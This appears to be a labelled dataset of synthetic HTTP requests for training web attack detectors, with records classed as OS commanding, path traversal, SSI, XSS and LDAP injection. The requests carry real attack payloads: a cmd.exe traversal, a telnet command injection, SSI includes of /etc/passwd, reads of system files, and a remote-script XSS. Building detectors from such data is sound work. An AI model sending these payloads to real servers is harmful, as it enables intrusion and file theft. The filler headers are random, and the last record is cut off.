Transfer-Encoding: gzip
Upgrade: e1e/4.3, eSaj/4.1, rweui/7.2
Warning: 517 www.wvohyi.html:69 "yTfliiT3oon" 
X-Forwarded-For: 246.53.246.66
X-Serial-Number: 587545
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35636
Start - Id: 43753
class: OsCommanding
GET /scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 80.30.248.2
Connection: abyuepu
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: iqg-ldal;q=0.0, d2-dtmy2t;q=0.6, syelspcb-hStti, Oa-fs, oo1esee-9gep4m
Cache-Control: tm1c=utar
Client-ip: 251.209.185.79
Cookie: 177system4YAi5=514;u2n9blpeD5=2295257394;ocoH=0776;hdzgiodpwAfew=mB dtesnph-systemaa~ y
Cookie2: $Version="1"
Date: Wed, 15 Jun 05 20:38:43 CET
ETag: W/"S2kqKS2NgMYdq_Ze"
Expect: fe8gaSr=na4I2h
From: Reoco@amlrswscus.de
If-Modified-Since: Sun, 10 Oct 04 02:21:56 CET
If-Unmodified-Since: Sat, 14 Mar 09 15:03:08 GMT
If-Match: "1GH--iKf_fhk5Nb1."
If-None-Match: *
If-Range: Tue, 19 Oct 04 05:08:13 GMT
Max-Forwards: 23
MIME-Version: 7.8
Pragma: eeehof=da
Proxy-Authorization: Digest cnonce="rPoaihzn"
Authorization: NTLM ZnRlZTd6ZG9zbjNkdGU5amt4Zm9pdGNlb3Jpc253aHBIaGhvc2FsZnR0aA==
Range: 210020-381691,-20380,4976-
Referer: http://www.etfdn1.org/LUrO7/eoewf/lrwbctly/jukt/seioes.jsp
TE: deflate;q=0.0,trailers,deflate;q=0.6
Trailer: Max-Forwards
User-Agent: siuuap (oj1xgliAMb; c_TaqV; oSk5pD6)
UA-CPU: Sparc
UA-Disp: 624,195,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 7271x959
Via: 7.6 www.jm2hErsu.jpg, HTTP/4.2 www.aged.png, 9.9 www.saos.css
Transfer-Encoding: compress
Upgrade: 2Ytn/5.0, a8qtt/0.1
Warning: 960 13.127.188.120 "eVdond" 
X-Forwarded-For: 247.183.255.17
X-Serial-Number: 442223002
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43753
Start - Id: 46215
class: PathTransversal
GET /xLi/q_0Pe/rtee/GnrwOess/a68nrtope/bocnu/soBsg/w7u_-OOtY_ff_G5i6s/o8fEceeiksnxml/sphpzStmpl4ozmNQgW2.tiff?op1=01938&meEernpebs=%2Fetc%2Fhttpd%2Fhttpd.conf&lnrybuim=irnkosectapl&eetyg=w7ng8ita+-d HTTP/1.0
Host: www.eey1ereib.be
Connection: sbtie7o
Accept: image/jpeg;q=0.0, video/*, audio/*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 244.185.69.193
Cookie: nSvuayEeloeiobT=4spametame9d gcoh;ktey0anaan=rxE24RapYXUO;rmsts9eai=sstt;ZEQZt=rO@0IK
Cookie2: $Version="6"
Date: Sat, 27 Nov 04 08:49:38 GMT
ETag: "lyp56_QbpqgxD-1"
Expect: 100-continue
From: xeibsrh@cIoaz0o30a.fr
If-Modified-Since: Fri, 06 Mar 09 22:45:35 CET
If-Unmodified-Since: Wed, 05 Mar 08 22:16:58 GMT
If-Match: *
If-None-Match: "VL4NFPxc6pSH6VtU"
If-Range: Thu, 07 May 09 20:50:58 CET
Max-Forwards: 36
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: nuit ePlSnli=Ews6alar
Authorization: Basic aDBlczptaWU5aQ==
Range: 63-8582,2-821656
Referer: http://el4d.gov/aetyoEge/Epssen/9dnt.asp
TE: chunked,trailers
Trailer: Date
User-Agent: Mozilla/3.5 (compatible; MSIE 2.8; WinNT; t9g4bfc2Ei; eeuvu9siy; cioepta9gt)
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6581x3968
Via: qhh/8.1 23.121.86.177:2189, rnu/1.6 209.151.91.137:296
Transfer-Encoding: aLnyd
Upgrade: esjpot/5.8, eni/8.5, tytox8/4.9
Warning: 048 www.olNtt.tiff "8Oh4bg22euilahgn" 
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 79986231728889
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46215
Start - Id: 44651
class: PathTransversal
GET /ac/uOM3HYNRQbQMyFan/no6e6hry/CFAdwxjnph-27jQ/entr5aswtnnht/YoDblv/dssxtieodxripe5Ht/exThidoNse9l/rs/mras05@ED.jpg?vu4rOEhuniond=z7&a8=iraRqaah&nodey2UxUaSAMNf=fhtslisjauamue&9cfbLn0o=8291&e3alk=7261&i5dh8s=Li&dK_qL=at.mGfVX_kfe HTTP/1.0
Host: 226.3.184.254:00857
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: eOihficl-osp;q=0.0, vd-adiYf;q=0.1, dMmosaho-eHO;q=0.9, ptriOn5i-4br
Cache-Control: max-stale
Cookie: r3anaS=0M_tXpGZX8J;bt3tapntd7=6c1cad;ntuelfI6zziOeu=wgetid)esenAos;)c;omo8lseae=tMQlfJs
Cookie2: $Version="5"
Date: Mon, 28 Nov 05 17:16:33 UTC
If-Modified-Since: Fri, 26 Oct 07 15:23:28 UTC
If-Match: "F2GpuHViQ9O94MBcEJ"
Max-Forwards: 796
Pragma: no-cache
Authorization: hseh 1r7qih=ApGsE
Referer: /efnusi/7euck/eunNx.swf
TE: trailers,gzip;q=0.3
Trailer: Accept-Encoding
User-Agent: collection(  file:///c:/ee/lacopvsg.xml  )
UA-CPU: MIPS
UA-Disp: 547,072,16
Via: 6.7 175.154.173.158, 4.7 228.14.24.38, 9.2 206.24.144.19
Transfer-Encoding: deflate
X-Forwarded-For: 52.237.224.178

null

End - Id: 44651
Start - Id: 43220
class: OsCommanding
GET /rvreeiTlj/rjFdSSb@l_t9LKyY/iCiyolJJT7p@Cv8_/ayxATfiS1_J/cWfromluzsdKMyCsock_streamsX/haneehusHceos94ew2eH/bt7oAn7nutxd/aqkvSu/noQR7.A@JP48pl/sO.OUS.html?epc=eskmnbYKr&el9Irov2yI=697999835&nFnhnza=426446&8eo=1012&bijeoohwdybh=s-&fn=cldroph&ixea=tsoeene0lacg&4ierjwTshe8ina=%5C%22++++%5C%3B++++%5C%2Fusr%5C%2Fbin%5C%2Ftelnet++www.teiser.com++8168+++%3B&iicgdyd=3431527&4K7MhscriptAf=ifde&ifl5qedO=bpuisNhedNzts&mcn84uus5dIime=41271&mHVcSIUdZ=6tce%28&sEg=5&Ovn1fq6e8a=ELt HTTP/1.0
Host: 181.69.85.190
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 141.13.227.191
Cookie: 6hdrae7I=4036153164;vmtt=rhl8l';cwWnwbEg=3
Cookie2: $Version="492"
Date: Fri, 09 Apr 04 06:45:37 CET
ETag: "vwwfk9ovLGa8IzJLe"
Expect: 100-continue
From: Odth@g78cnm.uk
If-Modified-Since: Tue, 20 Nov 07 15:05:29 UTC
If-Unmodified-Since: Wed, 27 Jan 10 09:11:49 CET
If-Match: "ZfzlTNiogMaFknCW1"
If-None-Match: *
If-Range: Fri, 31 Jul 09 14:00:06 CET
Max-Forwards: 229
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: NTLM ejh0cmZxc3R0YWhldjBvdHNnaHNlb3R5bW9zb2ptb2Vva2Vlb3RiSXRsaW4=
Authorization: ton5w eo0iw=9u8fi
Range: 2403-,12114-9,53-40810
Referer: http://www.erzrj.gov/iy5nrs/lkiv3z/inee.jpeg
TE: trailers,deflate;q=0.6,deflate
Trailer: TE
User-Agent: 014thi8anfxetaSttct
UA-CPU: x86
UA-Disp: 1503,1276,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 476x125
Via: twm/1.6 www.auntsqe1.shtml
Transfer-Encoding: gzip
Upgrade: pIh6l/8.2, tEst/3.2
Warning: 633 195.113.214.10 "tse9mteOot6asnp" "Thu, 30 Jun 05 07:11:38 GMT"
X-Forwarded-For: 4.63.150.148
X-Serial-Number: 3512760212193
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43220
Start - Id: 44500
class: OsCommanding
GET /bin/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.1
Host: www.reehRufat.biz
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-turkish, shift_jis, iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: *
Cache-Control: n=oye9X
Client-ip: 245.96.181.37
Cookie: 3mo=bqee;mN8=dautoexec47ochilde;enate=824791710;nmdofaltwoduov7=1Rc-0_B-
Cookie2: $Version="20"
Date: Mon, 04 Dec 06 17:25:36 GMT
ETag: "IUVO4qgAnfRz99rZqxh"
Expect: 100-continue
From: trtanl@hpchnnll.de
If-Modified-Since: Mon, 10 May 04 10:11:48 CET
If-Unmodified-Since: Tue, 07 Jul 09 10:23:58 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 098
MIME-Version: 8.2
Pragma: wd=vaec
Proxy-Authorization: NTLM Z2VpdXJ0b2FubGVFNG95ZWhvZmVwckZkdDF0d2ltcW5kZGRobnRrT2hl
Authorization: Basic TlVhcjpzbWhpYUhydA==
Range: -80,3-,-9028
Referer: http://www.s7tzF.com/errnoatt/Rgteifr/wcewkn/fryu5OM5/2tegStt.jpeg
TE: trailers,trailers
Trailer: Via
User-Agent: Mozilla/3.1 (X11; U; Solaris 2.1; Na-ot; rv:8.8.0) Gecko/37445320
UA-CPU: Sparc
UA-Disp: 715,347,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 455x841
Via: FTP/4.0 2.248.65.229:8462
Transfer-Encoding: deflate
Upgrade: e50et/1.4
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 80317009323381424111
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44500
Start - Id: 42880
class: OsCommanding
GET /9y4DFc.XZ.Jh39G/PncY321cmdx/dTWLkjFQN/qybrWPFl6@tt/tc/tFmbQH8p31XNR/ayr/hoq/lJBgI6dkIg/INiT_-4/vewe5ooaiureofcir8ed.png?MXKrbuwp=pVods2iuelued7n&nDweohfsitiA=Ce%3Apsstyshutdown&open-nu7pAXNQwH=25.22.96.187+%7C++++cmd.exe+%2Fs&nrtzn3i3=8&emLuewhne8mtt=34011&E5=n%5C+vsh&1lilosDeetk=992 HTTP/1.0
Host: www.rheteKjan5.org
Connection: keep-alive
Accept: video/mpeg;q=0.6
Accept-Charset: x-mac-turkish;q=0.8, koi8-r
Accept-Encoding: identity;q=0.3, identity;q=0.7, deflate;q=0.1, deflate, gzip;q=0.1
Accept-Language: bTw-niulgR;q=0.1, eyj-cedugrnt, lsy-drianmco
Cache-Control: only-if-cached
Client-ip: 241.68.47.162
Cookie: se=ngst;xeh=rmlet;rqEewwsTxtcid=EpohPieqsjnbeFa6
Cookie2: $Version="443"
Date: Fri, 11 May 07 06:52:59 UTC
ETag: "mC@rd8lAtMiE6hU-B"
Expect: 100-continue
From: n2zse0bo@tibsA.uk
If-Modified-Since: Sat, 13 Jun 09 14:38:46 CET
If-Unmodified-Since: Sat, 28 Nov 09 19:04:30 UTC
If-Match: "AetJ3vyGNa.Y_EyF7"
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 6.8
Pragma: gaNta=ssyssn
Proxy-Authorization: NTLM cG8wZVJ4ZmZ1bjc2c1RsYU5kblRzT2R0aW5Ib290b3A1
Authorization: Basic bGVhZTpzc0hTc3Vv
Referer: http://nooiajre.be/rnxse/alaoE/atw4/Nlihhit/lz0tHaSt.asmx
TE: trailers,deflate;q=0.0
Trailer: Upgrade
User-Agent: Aieoy (4U202ytdN)
UA-OS: Win98
UA-Pixels: 4835x5695
Via: HTTP/2.9 www.nadel.tiff, 6.9 155.196.119.58:4, 6.0 48.133.224.102
Transfer-Encoding: hstcR; aenausut=sttkd
Upgrade: llre/7.7, ldlseg/5.7
Warning: 973 www.a2Mltbl.jpeg "ycengdeih" "Sun, 20 Nov 05 15:07:42 CET"
X-Serial-Number: 24256159613993344
----: ------------------------------------------------

null

End - Id: 42880
Start - Id: 40397
class: SSI
PUT /QoNjNshutdownBX2GQw/rudLr6ih3Cocdae/0-/u6.YGA7S/xl7kDORN/t_iImsH4YG/snssleek/positionJFPMjWw/elBlIkdQro/vaR6KcR1fCI/6oeieovmiwrnhc4c.tiff? HTTP/1.0
Content-Length: 426
Content-Language: e7subT,adRnfsAy,Irz
Content-Encoding: deflate
Content-Location: /scrwhod/edSs.txt
Content-MD5: NW9sYWNjaW1ldHR1ZUVwZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 01 May 09 04:06:04 UTC
Last-Modified: Thu, 05 Nov 09 23:43:43 UTC
Host: www.yulwi6g0.gov
Connection: keep-alive
Accept: application/*;q=0.5
Accept-Charset: *
Accept-Encoding: compress;q=0.4, gzip;q=0.6, deflate;q=0.5, compress;q=0.7
Accept-Language: *
Cache-Control: no-cache
Client-ip: 114.160.166.134
Cookie: s9leNiph=ih:oA;es1=aletTrTaoa;moROobrnuhtir=9537
Date: Sun, 27 Sep 09 16:09:49 UTC
ETag: "C1JZ8VSvPBBfnh32qEk"
Expect: 100-continue
If-Modified-Since: Wed, 21 Jan 04 10:15:48 GMT
If-None-Match: "5SdyTB56Xusv-C.fULwo"
Max-Forwards: 3450
Pragma: s8ltmlsa=ii
Authorization: Basic dHNhZXQ6ZWJlbUllaXY=
Referer: http://nheeert.net/cii3w/uhe8srm7/thuoi.swf
User-Agent: eTsoj/0.8.1
UA-CPU: Sparc
Transfer-Encoding: deflate
Upgrade: r0s/1.0, lq2/5.3, id5yom/8.4, lar/7.9
X-Forwarded-For: 24.137.231.7

canseAiasfd3vdi=lkuuoehAlfnauoe&2v30sentMu5deo=Uwhr2shonerplbNpd&sw6leukrbNaa3ae=<!--   #include    virtual="d:\windows\autoexec.bat"-->&tFegAPt=hJi7&bet=aelfe5tcrpTw&AaSXYEyA=5301806&ahnaa=33490221&Xusrstdinecho-BUFk=5&taiAtehhepe=341000&acsriseorc=w8aeefcfqsoesRse&1aexecmbmailCO1mh=e90ds&umkfs9eihl=r)t eaccess_logao8siaSsesystemBsstyle&TXuQGI7A9b=gTOsFD&eth=9lEnlar8ina&h0jJl-=trsystemawherefnteenos6

End - Id: 40397
Start - Id: 46950
class: XSS
PUT /i-EzHvGGxCqELUe/hWfrsU2wWaVG/tGwEpDHK/jvpIzETB.RJ7CQBX4/dgLg-J3s.lS_AV@69h-d/r7g3NTlq8K/ir3.9c/hTvhXb/i9RPX.RiPI/aU@gYeqw9GjWL_sF/uhqltDn3/eTD9IhYuo5ZHix7C7Egn.htm? HTTP/1.0
Content-Length: 361
Content-Language: n1ngtaoq,lwe,mznmij
Content-Encoding: deflate
Content-Location: http://www.h6ettue.de/8bipn/nAutt/5altbtl/2Jmt/ai2ds.htm
Content-MD5: bnJ3aW5lc2lBN2xlbGh1VA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 04 Apr 05 04:41:52 GMT
Last-Modified: Sat, 15 Mar 08 09:36:08 CET
Host: www.d0seoo.st
Connection: n4aakt
Accept: */*;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 15.111.69.143
Cookie: geebansc=e8vEkOUN;eiabov0mreurf=zgNIeySc9H;zdcbinZH3=egiisxyzir\nr2
Cookie2: $Version="22"
Date: Thu, 27 Sep 07 08:45:11 UTC
ETag: "NViduy7oqvlSc-i"
Expect: mexltil=sUytWu
From: 2cxo@n9mijtAeoE.biz
If-Modified-Since: Sat, 08 Sep 07 02:06:19 GMT
If-Unmodified-Since: Sun, 08 Jul 07 12:09:50 CET
If-Match: "S4vIIFLQRqZ8yp.V.L1V"
If-None-Match: *
If-Range: *
Max-Forwards: 00
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Basic Z2VveGk6ZXRhbjFvdA==
Authorization: EbVht ttmrelsa=rtwds
Range: -3291
Referer: http://vheis.com/beorzua/ortlyiv/owea/atsyIid/aq5n.jsp
TE: gzip,trailers,chunked;q=0.3
User-Agent: Mozilla/9.1 (compatible; xjidje; Mac OS X; heooocw; wTla; Uiewnzi)
UA-CPU: StrongARM
UA-Color: color8
Via: 9.7 www.utihie.tiff
Transfer-Encoding: compress
Upgrade: eOo/2.9, nd6H1f/1.0, mciu/8.9
Warning: 267 19.129.120.24 "tleaIa3" 
X-Forwarded-For: 71.176.242.104
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

crtihjkEdAiufs= h er&sfsIiaT1K=nnas&esSi=i2CIin2&tc=tty5cte&pgn7El1=tg_&1minos=e:is xtermeAeeftot&jvzeesv=l.QM@k&alolontseotea=eg0zOmdSr&Euyr4eaiEd=1&shpl6crSenpcoh=oa&mnsyndth=onni&9tmiiaasllDm2Th=s&iecn4alxeuecr=afohxmlkacunsz6&psfhrk3=<div style  =   "     behaviour: url([http://www.icasng.com/script/wl4Va6.pl]);   "   >

End - Id: 46950
Start - Id: 45239
class: PathTransversal
GET ////? HTTP/1.0
Host: 162.49.148.203
Connection: keep-alive
Accept: audio/x-wav;q=0.9, text/html
Accept-Charset: iso-8859-2
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 173.124.86.160
Cookie: tz=ueEAeO-tservicesutx r;8metaV5k=r@.j;toao4hnt=AN
Cookie2: $Version="071"
Date: Fri, 04 Aug 06 05:39:15 UTC
ETag: W/"t2Ytcd_RbO7gw0dHf"
Expect: lthuh
From: nr1cs36r@ar1hsxlt.org
If-Modified-Since: Fri, 30 Sep 05 20:40:57 UTC
If-Unmodified-Since: Sun, 29 Apr 07 07:15:34 GMT
If-Match: *
If-None-Match: "C.H7XAnMwTF16WeK"
If-Range: Thu, 26 Feb 09 18:52:01 CET
Max-Forwards: 8271
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Digest qop=evai40
Authorization: Basic b1l0c2U6OHRuaUFscw==
Range: 220-5761,42620-
Referer: /aRlea/dirt/uoctj8tt/eeCtolt/ei8n3ta.asmx
TE: chunked;q=0.3,trailers
Trailer: Expect
User-Agent: td9deI (tm@OwEdWHm; tZB.yYd15; eH9.DaOJ; o4.lUo; guQvssxDa)
UA-CPU: x86
UA-Disp: 568,3282,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2272x045
Via: 4.4 176.45.158.137, FTP/3.3 144.100.8.10
Transfer-Encoding: identity
Upgrade: ttt5/9.0, laolhr/8.9, geei2/4.3
Warning: 831 www.rueghla.htm "ecA7eejeodtti" 
X-Forwarded-For: 42.110.150.96
X-Serial-Number: 67855229
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45239
Start - Id: 45058
class: PathTransversal
GET /.nsf/../winnt/system.ini? HTTP/1.1
Host: www.nhtF.de:80
Connection: close
Accept: text/plain;q=0.8
Accept-Charset: cp-936;q=0.8, windows-1258, hz-gb-2312;q=0.7, x-mac-hebrew;q=0.9, iso-8859-5
Accept-Encoding: *
Accept-Language: 8j3ssdb-Meij;q=0.5, nnlw-elrwa2;q=0.7, txcyj-niewnhal, chlssnra-u, o1th-ibojiess
Cache-Control: max-age=13010
Client-ip: 4.109.212.12
Cookie: YmailPR5o1.wHIe=aD4ys%ieroptZ$e\ozms;mzre=38150;hi3bRn=42952258;elrw0jwtrohE=hzpKys
Cookie2: $Version="345"
Date: Fri, 13 Apr 07 05:57:43 CET
ETag: W/"VI05iHgMeDWsSIG"
Expect: ewaf=sngi;Nedtm=ctaEaQif
From: hyrpijtS@yytf9mx9es.net
If-Modified-Since: Wed, 10 Sep 08 08:41:58 GMT
If-Unmodified-Since: Thu, 27 May 04 23:47:01 GMT
If-Match: "rIGsar_3oCllg8h0ZHB"
If-None-Match: "GoqdBXduDrkbwhfn6"
If-Range: Sun, 09 Jan 05 05:47:04 CET
Max-Forwards: 217
Pragma: qRA='SeEme'
Authorization: Basic aTluZTp0NjJ3cw==
Range: 09453-71450,00-30
Referer: http://www.eblear.gov/6crisr/aefvR/umed/seenon/at8as.pl
TE: trailers,trailers,deflate
Trailer: Host
User-Agent: Mozilla/9.1 (Machintosh; U; Mac OS X 1.4; ei-ed; rv:4.9.5) Gecko/63474811
UA-CPU: MIPS
UA-Disp: 7777,3718,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 127x929
Via: FTP/3.0 203.30.2.204, FTP/6.1 190.6.230.223
Transfer-Encoding: gzip
Upgrade: sE8t/1.6, Nhe/7.5, xdp/3.6, iiAp/5.2, r0rr/5.2
Warning: 055 85.8.178.117 "rMtdnroe0tr7el" 
X-Forwarded-For: 138.45.117.11
X-Serial-Number: 04079870
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45058
Start - Id: 39810
class: SSI
GET /ejfsRdDc0CV7mKb/rDsMfK4_SgNIoF7141/RYUan3x/OKuc-aNLlsew/cKNL6wp-.shtml?u2einltds=ola+rCs%3Etyi&n0inbcdasa=8otrtiWaa&sS96coL=908091&Esqgssediqo=52692800&SoBnLhECXp4=%3C%21--+++++%23include++virtual%3D%22%2Fetc%2Fpasswd%22--%3E&onnvs=%25Emn&Va=waj7a5neotE&vWunionS=931777 HTTP/1.1
Host: www.ehado.com:518
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.2, compress, compress, deflate;q=0.8, deflate
Accept-Language: ors0i-s, uOtt-a;q=0.0
Cache-Control: no-cache
Client-ip: 43.200.222.134
Cookie: sgde=d2Lnas
Cookie2: $Version="9"
Date: Sat, 27 Dec 08 20:26:20 CET
ETag: W/"HB4MgAj2e0M.0QXb"
Expect: 100-continue
From: cbnnjsi@dofak2rw.org
If-Modified-Since: Sun, 19 Apr 09 11:59:37 GMT
If-Unmodified-Since: Thu, 30 Mar 06 11:17:16 UTC
If-Match: "5S2a5xeq29wu6Auy"
If-None-Match: *
If-Range: Sun, 29 Apr 07 13:55:12 UTC
Max-Forwards: 23
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest username="eege"
Authorization: Digest username="oeue"
Range: 9717-347450,4-
Referer: /sRiCeyr/4slp/04engeTf/ftzoknuh.wav
TE: trailers,trailers
Trailer: Connection
User-Agent: Mozilla/7.8 (Windows; U; Win 9x 8.7; M1-rG; rv:0.8.5) Gecko/76016235
UA-CPU: Sparc
UA-Disp: 052,114,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 468x7869
Via: HTTP/0.1 www.geSd1Cog.shtml, 8.3 2.70.101.155, 1.8 www.IP3tw.htm
Transfer-Encoding: gzip
Upgrade: oLt/5.9, tEgb/6.9, 6laet/2.7, faare2/0.4, vst20/6.5
Warning: 410 230.107.4.184 "ldn6oohitmEt6c" 
X-Forwarded-For: 142.194.73.31
X-Serial-Number: 0280999804959
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39810
Start - Id: 45460
class: PathTransversal
GET /sIr/ere/2emuUg0iS/inainas.jpg?dchf=31457406&erat1=Dmwoae&eYMxLqjZ=11081866&e2eDnd=920762&Tenr=492&apod=e%3A%5C%5CWINNT%5C%5Cwin.ini&rEsoeeswraut=ihr&tjcakudZa=+group+bycmde+&hgTNes=19&aTutv8aat=igmi HTTP/1.1
Host: 253.98.21.88
Connection: si0nsbJ
Accept: */*
Accept-Charset: x-mac-korean;q=0.6, x-mac-arabic
Accept-Encoding: *;q=0.3
Accept-Language: moag-etlkmWr, e-hrd, tqRlwbl-3u, c7n0-ho5St2y
Cache-Control: no-cache
Client-ip: 146.188.206.131
Cookie: ieont=elaqntnHtmnb;ujwenciacns=etjia8eehrT0Ltn;fYqAmetaPJb3n9s=o2s;srniTamIexdx=nbb6j;lgfmtektiD=rS3qg;uN=0h
Cookie2: $Version="9"
Date: Wed, 08 Oct 08 02:01:03 UTC
ETag: W/"ykxm-pui8uIZxoq6u-"
Expect: Aaanpure=lNoecKtO;sennnr=d0swm
From: erap@nfrIiSoBzt.gov
If-Modified-Since: Thu, 31 Jul 08 06:23:31 GMT
If-Unmodified-Since: Sat, 07 Oct 06 11:52:08 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 08 Sep 07 20:30:10 CET
Max-Forwards: 19
Pragma: ta9r='Pend'
Proxy-Authorization: Basic bnRhV29yaXQ6c2Rhcg==
Authorization: HeItn1 idfse=an3Scgh
Range: -23,7962-,63876-540949
Referer: /oame/rskau.mdb
TE: deflate;q=0.7,deflate;q=0.4,deflate;q=0.1
Trailer: Host
User-Agent: hr5Wrreuf/2.8.5
UA-Disp: 5444,1005,8
UA-OS: Win9x
UA-Color: color8
Via: Ehles/8.4 www.ft17.tiff, HTTP/5.3 www.FTri.css
Transfer-Encoding: identity
Upgrade: dotvf/0.0, efio7/3.4
Warning: 772 13.181.197.72 "EhhrrueNfweeetlyl" "Sun, 20 Dec 09 03:55:23 GMT"
X-Forwarded-For: 176.191.17.103
X-Serial-Number: 347804024892974921
----: -----------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 45460
Start - Id: 39059
class: LdapInjection
PUT /e3uamhrul8netoucj/noT/45s7one/fwdd9po58TMLVWy2H6u9/nLT/2meelgtext/Omumr/aee3oTIsfnildv7e/UAl.asmx? HTTP/1.0
Content-Length: 253
Content-Language: sso,eaipdd,lsdtier
Content-Encoding: deflate
Content-Location: /aeyry/owne/no1nh/kissoua.aspx
Content-MD5: ZG50aHNBejdoRTducjdvOA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 07 Aug 07 13:06:41 GMT
Last-Modified: Thu, 04 May 06 13:18:14 UTC
Host: www.eveuuiug.uk:75483
Connection: attneNd
Accept: */*;q=0.7
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: Et-mictWods, cmayBtb1-ecttceTa, tRoeeT-tsad;q=0.3
Cache-Control: only-if-cached
Client-ip: 48.137.231.218
Cookie: qqlikeK=)    ( |(tTeun=li*)
Cookie2: $Version="914"
Date: Fri, 09 Oct 09 18:11:00 UTC
ETag: "BmfIbWTVu3mqx3pn"
Expect: 100-continue
From: atrbr@gtNexh7d.gov
If-Modified-Since: Sun, 04 Jan 09 11:15:42 CET
If-Unmodified-Since: Mon, 07 Feb 05 15:46:40 GMT
If-Match: "ccyJy1Pdj5idD2MvfNE"
If-None-Match: "f8Tnifjj.n_U7@olXj"
If-Range: "ViHvbB4RZ.kxxYYKRY"
Max-Forwards: 3
MIME-Version: 8.9
Pragma: hia=tt5Gstoa
Proxy-Authorization: usrL exto=oweCE
Authorization: NTLM c29Ub3Foa2xBZXVJaHRhcmRhbGU3ZWFpbmFEdG9vb2Vlb3JUNWl6
Range: 2-
Referer: /peeaiqte.msf
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/1.1 (X11; U; Open BSD i586 1.7; Ra-eo; rv:7.8.7) Gecko/03707653
UA-CPU: StrongARM
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0434x6105
Via: FTP/3.9 www.cye7.html, 3.1 www.hcAaIn.jpeg
Transfer-Encoding: deflate
Upgrade: ado/2.6
Warning: 616 www.oufen.tiff:438 "otmetonsOo4nSzn" "Thu, 20 Sep 07 04:20:47 GMT"
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Da2t4u4khotzsx=rhno&zLF3=j"icl"nh&TyUMf=623358651&eb1MtiaFerheIet=services3cei2itk2pyyo5&xRoOh-9AK=trou7rd3zsi&iienrae2nr2t4df=7539&rurt=wesedumclikes)t&LpdE6Ckd=la&nt3cv=htSkna32ehroevd&dhe=acFPu&ieul9ctmnotC=nt1ar4tt&21rnln8=40304&neist58nn=1819

End - Id: 39059
Start - Id: 39877
class: SSI
GET /NEz9.SmWHlikeVB/skm5ttnd9at9/fslcwoyn2rHaer/frthxLunhwR/G1qFk/har/mHuUvq7ND8C/crJWiRPM4dYUg9n0G/dj4j@h17m5cEGp8bWm2O/QpbvEk2PlU9D/N1qxdelete0objecto7_/9A4k1IoT0E__8LtjhwY.css?toCnehO=unionssxrdbFnrZ9 HTTP/1.0
Host: www.ad4njtizvq.org
Connection: keep-alive
Accept: image/jpeg;q=0.3, application/postscript, audio/x-wav
Accept-Charset: x-mac-greek, iso-8859-5, windows-1257;q=0.2, iso-8859-7
Accept-Encoding: 
Accept-Language: Ncp-ebswonon;q=0.3, Uniq-zrnuy;q=0.8, Ewt-wh;q=0.6, cetYo1s-og;q=0.6
Cache-Control: o='isnDee'
Client-ip: 167.243.32.17
Cookie: 5elstoanrdc=290;ete=922;vgbif1AgoiOen=cwcdnMavbeae9;noratoutthhi=64NbyWCjJ
Date: Sun, 03 Sep 06 15:13:35 CET
ETag: W/"OVY61M7X4h5-R44"
Expect: 100-continue
If-Modified-Since: Sat, 27 Jan 07 21:21:16 GMT
If-Unmodified-Since: Thu, 17 Aug 06 03:07:34 CET
If-Match: *
If-None-Match: "hQnj3sA_Ll9hQ3J"
